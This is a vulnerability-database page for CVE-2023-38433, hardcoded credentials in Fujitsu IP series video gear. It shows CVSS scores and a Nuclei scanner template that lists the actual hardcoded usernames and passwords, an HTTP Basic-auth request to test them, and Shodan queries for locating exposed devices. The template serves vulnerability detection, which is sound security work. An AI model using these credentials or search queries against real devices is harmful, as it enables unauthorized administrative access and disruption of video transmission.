Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-38433
HistorySep 06, 2023 - 3:14 p.m.

Fujitsu IP Series - Hardcoded Credentials

2023-09-0615:14:55
ProjectDiscovery
github.com
4
fujitsu
ip series
hardcoded credentials
remote attacker
video transmission
unauthorized access
cve-2023-38433

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

0.003 Low

EPSS

Percentile

68.9%

Fujitsu Real-time Video Transmission Gear “IP series” use hard-coded credentials, which may allow a remote unauthenticated attacker to initialize or reboot the products, and as a result, terminate the video transmission. The credentials cannot be changed by the end-user and provide administrative access to the devices.
id: CVE-2023-38433

info:
  name: Fujitsu IP Series - Hardcoded Credentials
  author: AdnaneKhan
  severity: high
  description: |
    Fujitsu Real-time Video Transmission Gear “IP series” use hard-coded credentials, which may allow a remote unauthenticated attacker to initialize or reboot the products, and as a result, terminate the video transmission. The credentials cannot be changed by the end-user and provide administrative access to the devices.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to the device, potentially resulting in further compromise of the network.
  reference:
    - https://www.praetorian.com/blog/fujitsu-ip-series-hard-coded-credentials
    - https://nvd.nist.gov/vuln/detail/CVE-2023-38433
    - https://www.cisa.gov/news-events/ics-advisories/icsa-23-248-01
    - https://www.fujitsu.com/global/products/computing/peripheral/video/download
    - https://jvn.jp/en/jp/JVN95727578
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
    cvss-score: 7.5
    cve-id: CVE-2023-38433
    cwe-id: CWE-798
    epss-score: 0.0031
    epss-percentile: 0.69984
    cpe: cpe:2.3:o:fujitsu:ip-he950e_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: fujitsu
    product: ip-he950e_firmware
    shodan-query:
      - '"Server: thttpd/2.25b 29dec2003" content-length:1133'
      - '"server: thttpd/2.25b 29dec2003" content-length:1133'
    max-req: 1
  tags: cve2023,cve,fujitsu,ip-series

http:
  - raw:
      - |
        GET /b_download/index.html HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}

    attack: pitchfork
    payloads:
      username:
        - fedish264pro
        - fedish265pro
      password:
        - h264pro@broadsight
        - h265pro@broadsight

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Field Support'

      - type: status
        status:
          - 200
# digest: 490a004630440220339e122342e81795d73baca010a14f5f18ebda3889eb36b5df9ad2052cc451f90220310bcf82220b0bcebf3650c9eed525433112c6c74a38dfdced33aecf17eb6784:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

0.003 Low

EPSS

Percentile

68.9%

Related for NUCLEI:CVE-2023-38433